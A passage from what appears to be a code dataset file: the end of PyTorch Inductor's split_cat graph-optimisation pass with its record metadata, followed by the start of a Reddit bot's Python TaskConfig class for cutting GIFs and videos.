depends on\n simplified_user_inputs.append(user_input.args[1])\n return self.merge_consecutive_inputs(simplified_user_inputs)\n\n def get_non_cat_node_input(\n self, split_node: torch.fx.Node, node: torch.fx.Node\n ) -> List[_Range]:\n \"\"\"\n Get input for a non cat node in the same format as `get_merged_user_inputs`\n \"\"\"\n node_input = []\n split_users = set(split_node.users.keys())\n for node_arg in node.all_input_nodes:\n if node_arg in split_users:\n getitem_num = get_arg_value(node_arg, 1)\n node_input.append((getitem_num, getitem_num))\n return node_input\n\n def merge_consecutive_inputs(\n self, inputs: List[Union[torch.fx.Node, int]]\n ) -> List[Union[torch.fx.Node, _Range]]:\n \"\"\"\n Merge consecutive inputs going into a user node.\n\n For e.g.\n [arg0, 0, 1, 2, arg1] -> [arg0, (0, 2), arg1]\n \"\"\"\n merged_ranges = []\n cur_range = None\n for input_ in inputs:\n if isinstance(input_, int):\n if not cur_range:\n cur_range = [input_, input_]\n elif input_ == cur_range[1] + 1:\n cur_range[1] += 1\n else:\n merged_ranges.append(tuple(cur_range))\n cur_range = [input_, input_]\n else:\n if cur_range:\n merged_ranges.append(tuple(cur_range))\n cur_range = None\n merged_ranges.append(input_)\n if cur_range:\n merged_ranges.append(tuple(cur_range))\n return merged_ranges\n\n def get_simplified_split_ranges(\n self,\n split_sections,\n next_users,\n user_inputs_list: List[List[Union[torch.fx.Node, _Range]]],\n ) -> Optional[List[_Range]]:\n ranges = set()\n for user_node, user_inputs in zip(next_users, user_inputs_list):\n ranges |= {\n user_input\n for user_input in user_inputs\n if isinstance(user_input, tuple)\n }\n cumulative_sizes = [0] + torch.cumsum(torch.tensor(split_sections), 0).tolist()\n split_ranges = sorted(\n [(cumulative_sizes[r[0]], cumulative_sizes[r[1] + 1]) for r in ranges]\n )\n\n if not self.has_non_overlapping_ranges(\n split_ranges,\n ): # This need not be a strict condition\n # However, we keep it now for simplicity.\n return None\n split_ranges = self.fill_gaps(split_ranges, 0, cumulative_sizes[-1])\n if len(split_sections) == len(split_ranges): # Simplification not possible\n return None\n counters[\"inductor\"][\"scmerge_split_sections_removed\"] = len(\n split_sections\n ) - len(split_ranges)\n return split_ranges\n\n def has_non_overlapping_ranges(self, ranges: List[_Range]) -> bool:\n for range_, next_range in zip(ranges, ranges[1:]):\n if range_[1] > next_range[0]:\n return False\n return True\n\n def fill_gaps(self, ranges: List[_Range], min_: int, max_: int) -> List[_Range]:\n cur = min_\n filled_ranges = []\n for a, b in ranges:\n if cur < a:\n filled_ranges.append((cur, a))\n filled_ranges.append((a, b))\n cur = b\n if filled_ranges[-1][1] < max_:\n filled_ranges.append((filled_ranges[-1][1], max_))\n return filled_ranges\n\n def get_transform_params(\n self,\n split_node: torch.fx.Node,\n next_users: List[torch.fx.Node],\n user_inputs_list: List[List[Union[torch.fx.Node, _Range]]],\n ) -> Optional[List[List[_TransformParam]]]:\n \"\"\"\n Figure out what transforms are needed for each input to each cat node.\n\n We replace a split node with an unflatten followed by a movedim\n \"\"\"\n split_dim = split_node.kwargs[\"dim\"]\n split_sections = split_node.args[1]\n transform_params_list: List[List[_TransformParam]] = []\n\n for user_node, user_inputs in zip(next_users, user_inputs_list):\n if user_node.target not in {torch.cat, torch.stack}:\n transform_params_list.append([])\n continue\n\n cat_dim = get_arg_value(user_node, 1, \"dim\")\n transform_params: List[_TransformParam] = []\n for user_input in user_inputs:\n if split_dim == cat_dim and user_node.target == torch.cat:\n # No transform needed\n transform_params.append((None, None, None, None))\n elif isinstance(user_input, tuple): # Split being simplified\n # Verify equal split\n subset_split_sections = split_sections[\n user_input[0] : user_input[1] + 1\n ]\n # All sections should be equal\n if len(set(subset_split_sections)) != 1:\n return None\n\n num_splits = len(subset_split_sections)\n unflatten_params = (split_dim, (num_splits, -1))\n movedim_params = (\n (split_dim, cat_dim) if split_dim != cat_dim else None\n )\n transform_params.append(\n (unflatten_params, movedim_params, None, None)\n )\n elif (\n user_node.target == torch.stack or split_dim != cat_dim\n ): # We need to unsqueeze inputs not coming through split\n transform_params.append((None, None, (cat_dim,), None))\n else: # Non-split inputs\n transform_params.append((None, None, None, None))\n transform_params_list.append(transform_params)\n return transform_params_list\n\n def replace_split(\n self,\n graph: torch.fx.Graph,\n split_node: torch.fx.Node,\n split_sections: List[int],\n user_inputs_list: List[List[Union[torch.fx.Node, _Range]]],\n split_ranges: List[_Range],\n ) -> List[List[torch.fx.Node]]:\n \"\"\"\n Replace the split node. It can either remove the split node if len(split_ranges) == 1, or simplify it\n into a split with lesser sections if len(split_ranges) > 1.\n\n Returns the new `user_inputs_list`, with tuples replaced with new getitems from the newer split node.\n \"\"\"\n split_input = split_node.args[0]\n split_dim = split_node.kwargs[\"dim\"]\n if len(split_ranges) == 1: # We can completely eliminate the split node\n split_items = [split_input]\n else:\n with graph.inserting_after(split_node):\n new_split = graph.call_function(\n torch.split,\n args=(\n split_input,\n [r[1] - r[0] for r in split_ranges],\n split_dim,\n ),\n )\n new_split.meta.update(split_node.meta)\n counters[\"inductor\"][\"scmerge_split_added\"] += 1\n with graph.inserting_after(new_split):\n split_items = [\n graph.call_function(operator.getitem, args=(new_split, i))\n for i in range(len(split_ranges))\n ]\n # Now assign the right getitem to the right input\n cumulative_sizes = [0] + torch.cumsum(torch.tensor(split_sections), 0).tolist()\n new_user_inputs_list = []\n for user_inputs in user_inputs_list:\n new_user_inputs = []\n for user_input in user_inputs:\n if isinstance(user_input, tuple):\n # Find the correct new getitem (present in split_items)\n new_user_inputs.append(\n split_items[\n split_ranges.index(\n (\n cumulative_sizes[user_input[0]],\n cumulative_sizes[user_input[1] + 1],\n )\n )\n ]\n )\n else:\n new_user_inputs.append(user_input)\n new_user_inputs_list.append(new_user_inputs)\n return new_user_inputs_list\n\n def replace_cat(\n self,\n graph: torch.fx.GraphModule,\n split_node: torch.fx.Node,\n next_users: List[torch.fx.Node],\n user_inputs_list_new,\n transform_params_list: List[List[_TransformParam]],\n ):\n split_dim = split_node.kwargs[\"dim\"]\n\n split_users = split_node.users.keys()\n new_cats = []\n for user_node, user_inputs_new, transform_params in zip(\n next_users, user_inputs_list_new, transform_params_list\n ):\n if user_node.target not in {torch.cat, torch.stack}:\n # Change the args and kwargs of non-cat/stack nodes. Replace old getitems (belonging to\n # the original split node) with the newer getitems\n next_cat_input = 0\n for input_node in user_node.all_input_nodes:\n if input_node in split_users:\n user_node.replace_input_with(\n input_node, user_inputs_new[next_cat_input]\n )\n next_cat_input += 1\n continue\n\n # Handle cat/stack user nodes\n cat_dim = get_arg_value(user_node, 1, \"dim\")\n user_inputs_new_transformed = []\n # For `unsqueeze` transform, we will combine consecutive inputs with the same unsqueeze params, and stack them\n to_stack = []\n stack_dim = None\n with graph.inserting_before(user_node):\n for user_input_new, transform_param in zip(\n user_inputs_new, transform_params\n ):\n # Apply transforms\n (\n unflatten_params,\n movedim_params,\n unsqueeze_params,\n flatten_params,\n ) = transform_param\n if unsqueeze_params and (\n stack_dim is None or stack_dim == unsqueeze_params[0]\n ):\n to_stack.append(user_input_new)\n stack_dim = unsqueeze_params[0]\n continue\n elif to_stack:\n stacked_input = graph.call_function(\n torch.stack, args=(to_stack, stack_dim)\n )\n to_stack = []\n stack_dim = None\n user_inputs_new_transformed.append(stacked_input)\n if unsqueeze_params:\n to_stack.append(user_input_new)\n stack_dim = unsqueeze_params[0]\n continue\n\n if unflatten_params:\n user_input_new = graph.call_function(\n torch.unflatten, args=(user_input_new, *unflatten_params)\n )\n if movedim_params:\n user_input_new = graph.call_function(\n torch.movedim, args=(user_input_new, *movedim_params)\n )\n if flatten_params:\n user_input_new = graph.call_function(\n torch.flatten, args=(user_input_new, *flatten_params)\n )\n user_inputs_new_transformed.append(user_input_new)\n if to_stack:\n stacked_input = graph.call_function(\n torch.stack, args=(to_stack, stack_dim)\n )\n user_inputs_new_transformed.append(stacked_input)\n\n with graph.inserting_after(user_node):\n if len(user_inputs_new_transformed) > 1:\n new_cat_node = graph.call_function(\n torch.cat, args=(user_inputs_new_transformed, cat_dim)\n )\n new_cat_node.meta.update(user_node.meta)\n counters[\"inductor\"][\"scmerge_cat_added\"] += 1\n else:\n new_cat_node = user_inputs_new_transformed[-1]\n\n if (\n user_node.target == torch.cat\n and split_dim != cat_dim\n and split_node.target == torch.split\n ):\n with graph.inserting_after(new_cat_node):\n new_cat_node = graph.call_function(\n torch.flatten, args=(new_cat_node, cat_dim, cat_dim + 1)\n )\n user_node.replace_all_uses_with(new_cat_node)\n new_cats.append(new_cat_node)\n\n def erase_old_nodes(\n self,\n graph: torch.fx.GraphModule,\n split_node: torch.fx.Node,\n next_users: List[torch.fx.Node],\n ):\n to_remove = [split_node]\n counters[\"inductor\"][\"scmerge_split_removed\"] += 1\n for getitem_node in split_node.users.keys():\n to_remove.append(getitem_node)\n for next_user in next_users:\n if next_user.target not in {torch.cat, torch.stack}:\n continue\n counters[\"inductor\"][\"scmerge_cat_removed\"] += 1\n to_remove.append(next_user)\n for node in reversed(to_remove):\n graph.erase_node(node)\n\n\nclass UnbindCatRemover(SplitCatSimplifier):\n \"\"\"\n Helper class to merge Unbind->Cat/Stack. Many of the cases are similar to SplitCatSimplifier.\n\n Unbind can't be simplified like splits. So, we can only remove the unbind node. Other than this,\n other cases like multiple users, additional args, dim mismatch are similar to `SplitCatSimplifier`,\n hence we extend that class.\n \"\"\"\n\n def remove_unbind(\n self,\n graph: torch.fx.Graph,\n unbind_node: torch.fx.Node,\n ):\n num_unbind = (\n max(getitem_node.args[1] for getitem_node in unbind_node.users.keys()) + 1\n )\n split_sections = [1 for _ in range(num_unbind)]\n\n super().simplify(graph, unbind_node, split_sections)\n\n def get_simplified_split_ranges(\n self,\n split_sections: List[int],\n next_users: List[torch.fx.Node],\n user_inputs_list: List[List[Union[torch.fx.Node, _Range]]],\n ) -> Optional[List[_Range]]:\n simplified_split_ranges = super().get_simplified_split_ranges(\n split_sections, next_users, user_inputs_list\n )\n if not simplified_split_ranges or len(simplified_split_ranges) != 1:\n return None\n return simplified_split_ranges\n\n def get_transform_params(\n self,\n unbind_node: torch.fx.Node,\n next_users: List[torch.fx.Node],\n user_inputs_list: List[List[Union[torch.fx.Node, _Range]]],\n ) -> Optional[List[List[_TransformParam]]]:\n \"\"\"\n Figure out what transforms are needed for each input to each cat node.\n\n Here is the rough transforms we apply:\n\n x -> unbind -> stack => x -> movedim\n\n x -> unbind -> cat => x -> movedim -> flatten\n\n When cat/stack nodes have additional args:\n\n addn ---| addn -> unsqueeze ---|\n x -> unbind -> stack => x -> movedim -> cat\n\n addn ---| addn ---|\n x -> unbind -> cat => x -> movedim -> flatten -> cat\n\n (Note application of these depends on the dims as well)\n\n\n \"\"\"\n split_dim = unbind_node.kwargs[\"dim\"]\n transform_params_list: List[List[_TransformParam]] = []\n for user_node, user_inputs in zip(next_users, user_inputs_list):\n cat_dim = get_arg_value(user_node, 1, \"dim\") or 0\n transform_params: List[_TransformParam] = []\n for user_input in user_inputs:\n if isinstance(user_input, tuple):\n # User input is coming from unbind\n movedim_params = (\n (split_dim, cat_dim) if split_dim != cat_dim else None\n )\n flatten_params = None\n if user_node.target == torch.cat:\n flatten_params = (cat_dim, cat_dim + 1)\n transform_params.append(\n (None, movedim_params, None, flatten_params)\n )\n elif (\n user_node.target == torch.stack\n ): # We need to unsqueeze inputs not coming through unbind into cat\n transform_params.append((None, None, (cat_dim,), None))\n else: # Non-unbind inputs\n transform_params.append((None, None, None, None))\n transform_params_list.append(transform_params)\n return transform_params_list\n\n\nclass GetItem(CallFunction):\n def __init__(self, arg, index, _users=1):\n super().__init__(operator.getitem, arg, index, _users=_users)\n\n def find_anchor_nodes(self, ctx: MatchContext, searched: Set[torch.fx.Node]):\n # We generally match GetItem with arg being an Arg(). So, we never return the anchor\n # nodes as the stored node in ctx.pattern_to_node is returned. Here we override find_anchor_nodes\n # to not use ctx.pattern_to_node\n for pattern in self.flat_args_kwargs[0]:\n if isinstance(pattern, PatternExpr):\n for other_node in pattern.find_anchor_nodes(ctx, searched):\n if not isinstance(other_node, torch.fx.Node):\n continue\n for node in other_node.users:\n if node not in searched:\n if self._match_fns(node):\n yield node\n searched.add(node)\n\n\n@register_graph_pattern(\n RepeatedExpr(\n CallFunction(\n torch.squeeze,\n GetItem(\n TorchSplit(\n KeywordArg(\"split_input\"),\n KeywordArg(\"split_sizes\"),\n ),\n Ignored(),\n ),\n KeywordArg(\"dim\"),\n _users=MULTIPLE,\n ),\n ),\n pass_dict=split_cat_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\n@register_graph_pattern(\n RepeatedExpr(\n CallFunction(\n torch.squeeze,\n GetItem(\n TorchSplit(\n KeywordArg(\"split_input\"),\n KeywordArg(\"split_sizes\"),\n ),\n Ignored(),\n ),\n dim=KeywordArg(\"dim\"),\n _users=MULTIPLE,\n )\n ),\n pass_dict=split_cat_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef merge_split_squeeze(\n match: Match, split_input: torch.fx.Node, split_sizes: List[int], dim: int\n):\n graph = match.graph\n split = next(node for node in match.nodes if node.target == torch.split)\n if not all(s == 1 for s in split_sizes):\n return\n if isinstance(dim, Sequence):\n return\n next_users = find_next_users(split)\n if not all(node.target == torch.squeeze for node in next_users):\n return\n with graph.inserting_before(match.output_node()):\n unbind = graph.call_function(\n torch.unbind, args=(split_input,), kwargs={\"dim\": dim}\n )\n for item_index, getitem_node in sorted(\n [\n (getitem_node.args[1], getitem_node)\n for getitem_node in split.users.keys()\n ]\n ):\n squeeze = next(iter(getitem_node.users.keys()))\n new_get_item = graph.call_function(\n operator.getitem, args=(unbind, item_index)\n )\n squeeze.replace_all_uses_with(new_get_item)\n new_get_item.meta.update(squeeze.meta)\n graph.erase_node(squeeze)\n graph.erase_node(getitem_node)\n graph.erase_node(split)\n counters[\"inductor\"][\"split_squeeze_replaced\"] += 1\n\n\ngetitem_unbind = ListOf(\n GetItem(\n CallFunction(\n torch.unbind,\n KeywordArg(\"unbind_input\"),\n dim=KeywordArg(\"dim\"),\n _users=MULTIPLE,\n ),\n Ignored(),\n _users=MULTIPLE,\n ),\n partial=True,\n)\n\n\n@register_graph_pattern(\n CallFunction([torch.stack, torch.cat], getitem_unbind, Ignored(), _users=MULTIPLE),\n pass_dict=unbind_stack_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\n@register_graph_pattern(\n CallFunction(\n [torch.stack, torch.cat], getitem_unbind, dim=Ignored(), _users=MULTIPLE\n ),\n pass_dict=unbind_stack_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\n@register_graph_pattern(\n CallFunction(\n [torch.stack, torch.cat], tensors=getitem_unbind, dim=Ignored(), _users=MULTIPLE\n ),\n pass_dict=unbind_stack_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef merge_unbind_stack(match: Match, unbind_input: torch.fx.Node, dim: int):\n unbind_node = next(node for node in match.nodes if node.target == torch.unbind)\n UnbindCatRemover().remove_unbind(match.graph, unbind_node)\n\n\ngetitem_split = ListOf(\n CallFunction(\n operator.getitem,\n TorchSplit(\n Ignored(),\n KeywordArg(\"split_sections\"),\n ),\n Ignored(),\n _users=MULTIPLE,\n ),\n partial=True,\n)\n\n\n@register_graph_pattern(\n CallFunction(\n [torch.stack, torch.cat],\n tensors=getitem_split,\n dim=Ignored(),\n _users=MULTIPLE,\n ),\n pass_dict=split_cat_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\n@register_graph_pattern(\n CallFunction(\n [torch.stack, torch.cat],\n getitem_split,\n dim=Ignored(),\n _users=MULTIPLE,\n ),\n pass_dict=split_cat_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\n@register_graph_pattern(\n CallFunction(\n [torch.stack, torch.cat],\n getitem_split,\n Ignored(),\n _users=MULTIPLE,\n ),\n pass_dict=split_cat_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef simplify_split_cat(match: Match, split_sections: List[int], dim: int):\n if not isinstance(split_sections, (list, tuple)): # Unnormalized split\n return\n split_node = next(node for node in match.nodes if node.target == torch.split)\n SplitCatSimplifier().simplify(match.graph, split_node, split_sections)\n\n\n# noqa: W605\n# ############The pattern to be optimized is#########\n\n# split_node(dim=1)\n# / \\ ... / \\\n# getitem getitem getitem getitem -> user=1\n# \\ / \\ /\n# cat (user=mul, dim=1) cat(user=mul, dim=1)\n# | \\ | \\\n\n# ################After transformation#############\n\n# split_node(dim=1)\n# / ... \\\n# getitem getitem\n# | \\ | \\\n\n\ndef safe_to_abort_node(node: torch.fx.Node):\n \"\"\"\n 1. the input nodes of the node should come from the same parent\n 2. the user of all the input nodes should be only one\n \"\"\"\n prev_node = None\n for arg in node.args[0]:\n if len(arg.users) != 1 or arg.target != operator.getitem:\n return False\n if prev_node is None:\n prev_node = arg.args[0]\n else:\n if arg.args[0] != prev_node:\n return False\n return True\n\n\ndef remove_zeros(split_sections: List[int]):\n \"\"\"\n Remove zeros from the list and get the index mapping dict from getitem\n in split node to getitem in new split node\n \"\"\"\n new_split_sections, index_mapping = [], {}\n idx = 0\n for i in range(len(split_sections)):\n if split_sections[i] > 0:\n new_split_sections.append(split_sections[i])\n index_mapping[i] = idx\n idx += 1\n\n return new_split_sections, index_mapping\n\n\n@register_graph_pattern(\n CallFunction(\n torch.cat,\n getitem_split,\n dim=Ignored(),\n _users=MULTIPLE,\n ),\n pass_dict=merge_getitem_cat_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef merge_getitem_cat(match: Match, split_sections: List[int], dim: int):\n if not isinstance(split_sections, (list, tuple)): # Unnormalized split\n return\n graph = match.graph\n split_node = next(node for node in match.nodes if node.target == torch.split)\n split_input, split_size, split_dim = _get_split_args_default(split_node)\n # if the cat and split have different dims, return\n # Find the next users (i.e. users after the getitem)\n next_users = find_next_users(split_node)\n # 'immutable_list' object does not support mutation. Create a new copy of it\n split_sections = list(split_sections)\n for cat_user in next_users:\n if cat_user.target == torch.cat:\n cat_dim = get_arg_value(cat_user, 1, \"dim\")\n if split_dim != cat_dim:\n continue\n # check the all getitems in the cat_user from the same node\n if not safe_to_abort_node(cat_user):\n continue\n # find the index of getitems to be cated/stacked\n indices = []\n for arg in cat_user.args[0]:\n indices.append(arg.args[1])\n # indices may not be necessarily sorted, we sort them first\n indices.sort()\n # update the arg of cat user, only keep the first getitem\n cat_user.update_arg(0, cat_user.args[0][0])\n # calculate the fused tensor sizes in the indices\n fused_tensor_size = 0\n for i in range(len(split_node.args[1])):\n if i in indices:\n fused_tensor_size += split_node.args[1][i]\n # update the split sections\n split_sections[indices[0]] = fused_tensor_size\n # padding others with zeros to keep the same dict size\n for i in indices[1:]:\n split_sections[i] = 0\n # remove all unused indexes in the split_node\n new_split_sections, index_mapping = remove_zeros(split_sections)\n with graph.inserting_after(split_node):\n new_split_node = graph.call_function(\n torch.split,\n args=(split_input, split_sections),\n kwargs={\"dim\": split_dim},\n )\n split_node.replace_all_uses_with(new_split_node)\n new_split_node.meta.update(split_node.meta)\n # remove all unused getitem nodes\n to_remove = [cat_user]\n # dictionary keys changed during iteration\n new_split_getitem_nodes = list(new_split_node.users.keys())\n for getitem_node in new_split_getitem_nodes:\n if getitem_node.args[1] in indices[1:]:\n to_remove.append(getitem_node)\n # update meta data of getitem\n elif getitem_node.args[1] == indices[0]:\n cat_user.replace_all_uses_with(getitem_node)\n getitem_node.meta.update(cat_user.meta)\n else:\n # update getitem index for new split node\n getitem_node.update_arg(1, index_mapping[getitem_node.args[1]])\n graph.erase_node(split_node)\n for getitem_node in to_remove:\n graph.erase_node(getitem_node)\n # update the split sections of new split node\n new_split_node.update_arg(1, new_split_sections)\n split_node = new_split_node\n split_sections = new_split_sections\n\n counters[\"inductor\"][\"getitem_cat_merged\"] += 1\n\n\n# noqa: W605\n# ############The pattern to be optimized is#########\n# split_node (dim=1)\n# / ... \\ ... / \\\n# getitem getitem getitem getitem -> user=1\n# \\ /\n# stack (dim=0) -> user=1\n# |\n# tahn -> user=1\n# |\n# unbind (dim=0)\n# |\n\n# ################After transformation#############\n# split_node (dim=1)\n# / ... / \\\n# getitem getitem getitem -> user=1\n# |\n# tahn\n# |\n# split\n# |\n\n\n@register_graph_pattern(\n CallFunction(\n torch.tanh,\n CallFunction(\n torch.stack,\n getitem_split,\n dim=Ignored(),\n _users=1,\n ),\n _users=1,\n ),\n pass_dict=merge_getitem_cat_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\n@register_graph_pattern(\n CallFunction(\n torch.tanh,\n CallFunction(\n torch.stack,\n tensors=getitem_split,\n dim=Ignored(),\n _users=1,\n ),\n _users=1,\n ),\n pass_dict=merge_getitem_cat_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\n@register_graph_pattern(\n CallFunction(\n torch.tanh,\n CallFunction(\n torch.stack,\n getitem_split,\n Ignored(),\n _users=1,\n ),\n _users=1,\n ),\n pass_dict=merge_getitem_cat_pass,\n extra_check=config_flag(\"split_cat_fx_passes\"),\n)\ndef merge_stack_tahn_unbind(match: Match, split_sections: List[int], dim: int):\n if not isinstance(split_sections, (list, tuple)): # Unnormalized split\n return\n graph = match.graph\n split_node = next(node for node in match.nodes if node.target == torch.split)\n split_input, split_size, split_dim = _get_split_args_default(split_node)\n # Find the next users (i.e. users after the getitem)\n next_users = find_next_users(split_node)\n # 'immutable_list' object does not support mutation. Create a new copy of it\n split_sections = list(split_sections)\n for user in next_users:\n # stack user only has one user\n if user.target == torch.stack:\n if not safe_to_abort_node(user):\n continue\n unbind_user = find_next_users(user)[0]\n if unbind_user.target != torch.unbind:\n continue\n unbind_dim = get_arg_value(unbind_user, 1, \"dim\") or 0\n stack_dim = get_arg_value(user, 1, \"dim\") or 0\n # stack and unbind shouldhave the same dim\n if unbind_user.target != torch.unbind or stack_dim != unbind_dim:\n continue\n # find the index of getitems to be stacked\n indices = []\n split_sections_for_unbind = []\n for arg in user.args[0]:\n indices.append(arg.args[1])\n split_sections_for_unbind.append(split_sections[arg.args[1]])\n # update the arg of stack user, only keep the first getitem\n user.update_arg(0, user.args[0][0])\n # calculate the fused tensor sizes in the indices\n fused_tensor_size = 0\n for i in range(len(split_node.args[1])):\n if i in indices:\n fused_tensor_size += split_node.args[1][i]\n # update the split sections\n split_sections[indices[0]] = fused_tensor_size\n # padding others with zeros to keep the same dict size\n for i in indices[1:]:\n split_sections[i] = 0\n # remove all unused indexes in the split_node\n new_split_sections, index_mapping = remove_zeros(split_sections)\n with graph.inserting_after(split_node):\n new_split_node = graph.call_function(\n torch.split,\n args=(split_input, split_sections),\n kwargs={\"dim\": split_dim},\n )\n replace_unbind_with_split = graph.call_function(\n torch.split,\n args=(unbind_user.args[0], split_sections_for_unbind),\n kwargs={\"dim\": split_dim},\n )\n unbind_user.replace_all_uses_with(replace_unbind_with_split)\n replace_unbind_with_split.meta.update(unbind_user.meta)\n # remove getitem and split, stack\n split_node.replace_all_uses_with(new_split_node)\n new_split_node.meta.update(split_node.meta)\n # remove all unused getitem nodes\n to_remove = [unbind_user]\n # dictionary keys changed during iteration\n new_split_getitem_nodes = list(new_split_node.users.keys())\n for getitem_node in new_split_getitem_nodes:\n if getitem_node.args[1] in indices[1:]:\n to_remove.append(getitem_node)\n # update meta data of getitem\n elif getitem_node.args[1] == indices[0]:\n user.replace_all_uses_with(getitem_node)\n getitem_node.meta.update(user.meta)\n else:\n # update getitem index for new split node\n getitem_node.update_arg(1, index_mapping[getitem_node.args[1]])\n graph.erase_node(split_node)\n graph.erase_node(user)\n for getitem_node in to_remove:\n graph.erase_node(getitem_node)\n # update the split sections of new split node\n new_split_node.update_arg(1, new_split_sections)\n split_node = new_split_node\n split_sections = new_split_sections\n\n counters[\"inductor\"][\"stack_tahn_unbind_merged\"] += 1\n","repo_name":"pytorch/pytorch","sub_path":"torch/_inductor/fx_passes/split_cat.py","file_name":"split_cat.py","file_ext":"py","file_size_in_byte":50247,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"11177624407","text":"import math\nimport os\nimport re\nfrom dataclasses import dataclass\nfrom io import BytesIO\nfrom typing import Dict, Callable, Tuple\nfrom typing import List\nfrom typing import Optional\nfrom typing import Union\nfrom urllib.parse import parse_qs, urlparse\n\nimport PIL\nimport requests\nfrom PIL.Image import Image\nfrom asyncpraw.models import Message\nfrom asyncpraw.models import Submission\nfrom bs4 import BeautifulSoup\n\nimport src.handler as handler_pkg\nimport src.model.result as result_pkg\nfrom src.model.media_type import MediaType\nfrom src.model.task_state import TaskConfigState\nfrom src.model.task_state import TaskState\nfrom src.util import exception, gif_utilities\nfrom src.util.aux import Watermark\nfrom src.util.aux import noop_image, fix_start_end_swap\nfrom src.util.aux import watermark_image\nfrom src.util.exception import TaskFailureException, OembedFailureException\nfrom src.util.logger import root_logger, task_logger\n\n\n@dataclass\nclass TaskConfig:\n \"\"\"A task configuration which is not serializable.\n\n Attributes:\n message The reddit message object.\n media_type The media type of the resource requested for cutting.\n start The start time in milliseconds from where to cut the MediaType.\n end The end time in milliseconds to stop the cut of the MediaType.\n watermark An optional callable that watermarks the cut media.\n state The state of this :class:~`TaskConfig`.\n is_oembed A flag indicating if the media is embedded via the oEmbed format (https://oembed.com/).\n is_video A flag indicating if the media is a video.\n is_gif A flag indicating if the media is a gif.\n is_crosspost A flag indicating if the media is crossposted.\n media_url The url to the media.\n duration The total duration of the media in seconds read from the `message`.\n extension The file extension of the media.\n \"\"\"\n message: Message\n media_type: MediaType\n start: float\n end: Optional[float]\n watermark: Callable[[PIL.Image.Image], PIL.Image.Image]\n\n def __init__(\n self, message: Message, start: float, end: Optional[float], media_type: MediaType, watermark:\n Optional[Watermark] = None\n ):\n self.message = message\n self.media_type = media_type\n self.__is_video = self.media_type in [MediaType.MP4, MediaType.MOV, MediaType.WEBM]\n self.__is_gif = self.media_type == MediaType.GIF\n if hasattr(message.submission, 'crosspost_parent'):\n self.__is_crosspost = message.submission.crosspost_parent is not None\n else:\n self.__is_crosspost = False\n start_ms, end_ms = fix_start_end_swap(start=start, end=end)\n start_ms = max(start_ms, 0) # put a realistic lower bound on end\n if self.duration is not None:\n # duration could be None here, will be computed in the specific handler\n end_ms = min(end_ms or math.inf, self.duration * 1000) # put a realistic upper bound on end\n self.start = start_ms\n self.end = end_ms\n self.watermark = noop_image if watermark is None else lambda img: watermark_image(img, watermark)\n self._state = TaskConfigState.VALID\n\n def __repr__(self) -> str:\n return f'TaskConfig(message: {self.message}, media_type: {self.media_type}, start: {self.start}, ' \\\n f'end: {self.end}, watermark: {self.watermark}, state: {self.state}, is_oembed: {self.is_oembed}, ' \\\n f'is_video: {self.is_video}, is_gif: {self.is_gif}, is_crosspost: {self.is_crosspost}, ' \\\n f'duration: {self.duration}, extension: {self.extension}, media_url: {self.media_url})'\n\n @property\n def state(self) -> TaskConfigState:\n return self._state\n\n def is_state(self, state: Union[TaskConfigState, List[TaskConfigState]]) -> bool:\n return self._state in state if state is List else self._state == state\n\n @property\n def is_oembed(self) -> bool:\n # full oembed spec: https://oembed.com/#section2\n # media is a dynamic attribute on submission\n if not hasattr(self.message.submission, 'media'):\n return False\n return bool(self.message.submission.media.get('oembed', False))\n\n @property\n def is_video(self) -> bool:\n return self.__is_video\n\n @property\n def is_gif(self) -> bool:\n return self.__is_gif\n\n @property\n def is_crosspost(self) -> bool:\n return self.__is_crosspost\n\n @property\n def media_url(self) -> str:\n # todo do this in __init__ and store in a \"_variable\"\n _submission: Submission = self.message.submission\n if self.is_oembed:\n return self.__get_oembed()[0]\n elif self.is_gif:\n if self.is_crosspost:\n return '' # todo\n else:\n return _submission.url\n elif self.is_video:\n if self.is_crosspost:\n reddit_video = _submission.crosspost_parent_list[0].get('secure_media').get('reddit_video')\n else:\n reddit_video = _submission.secure_media.get('reddit_video', {})\n media_url = reddit_video.get('fallback_url', '')\n if media_url == '':\n self._state = TaskConfigState.INVALID\n return media_url\n else:\n raise exception.TaskConfigFailureException('Cannot parse attribute media_url.')\n\n @property\n def duration(self) -> Optional[float]:\n # todo do this in __init__ and store in a \"_variable\"\n if self.is_gif:\n # AFAIK there is no duration sent when we are dealing with a GIF\n with requests.get(self.media_url, stream=True) as resp:\n if resp.ok:\n self._state = TaskConfigState.VALID\n # read whole file via StreamReader into BytesIO\n _stream = BytesIO(resp.raw.read())\n _stream.seek(0)\n return gif_utilities.get_gif_duration(image=PIL.Image.open(_stream))\n else:\n self._state = TaskConfigState.INVALID\n return math.nan\n elif self.is_video:\n _submission: Submission = self.message.submission\n if self.is_crosspost:\n reddit_video = _submission.crosspost_parent_list[0].get('secure_media').get('reddit_video')\n else:\n reddit_video = _submission.secure_media.get('reddit_video', {})\n return reddit_video.get('duration')\n else:\n # self._state = TaskState.INVALID # duration will be computed in the specific handler if None\n return None\n\n @property\n def extension(self) -> Optional[str]:\n # todo do this in __init__ and store in a \"_variable\"\n ext: Optional[str]\n _submission: Submission = self.message.submission\n if self.is_oembed:\n return self.__get_oembed()[-1]\n elif self.is_gif:\n if self.is_crosspost:\n ext = None # todo how to handle crossposted gifs?\n else:\n ext = os.path.splitext(_submission.url)[-1][1:]\n elif self.is_video:\n if self.is_crosspost:\n # todo make sure it always works with index 0 (should be the first post)\n reddit_video = _submission.crosspost_parent_list[0].get('secure_media').get('reddit_video')\n else:\n reddit_video = _submission.secure_media.get('reddit_video', {})\n ext = os.path.splitext(reddit_video.get('scrubber_media_url', [' ']))[-1][1:]\n else:\n self._state = TaskState.INVALID\n ext = None\n if ext == '' or ext is None:\n ext = None\n self._state = TaskConfigState.INVALID\n return ext\n\n def __get_oembed(self) -> Tuple[str, str, str]:\n \"\"\"Returns a tuple with the source url, 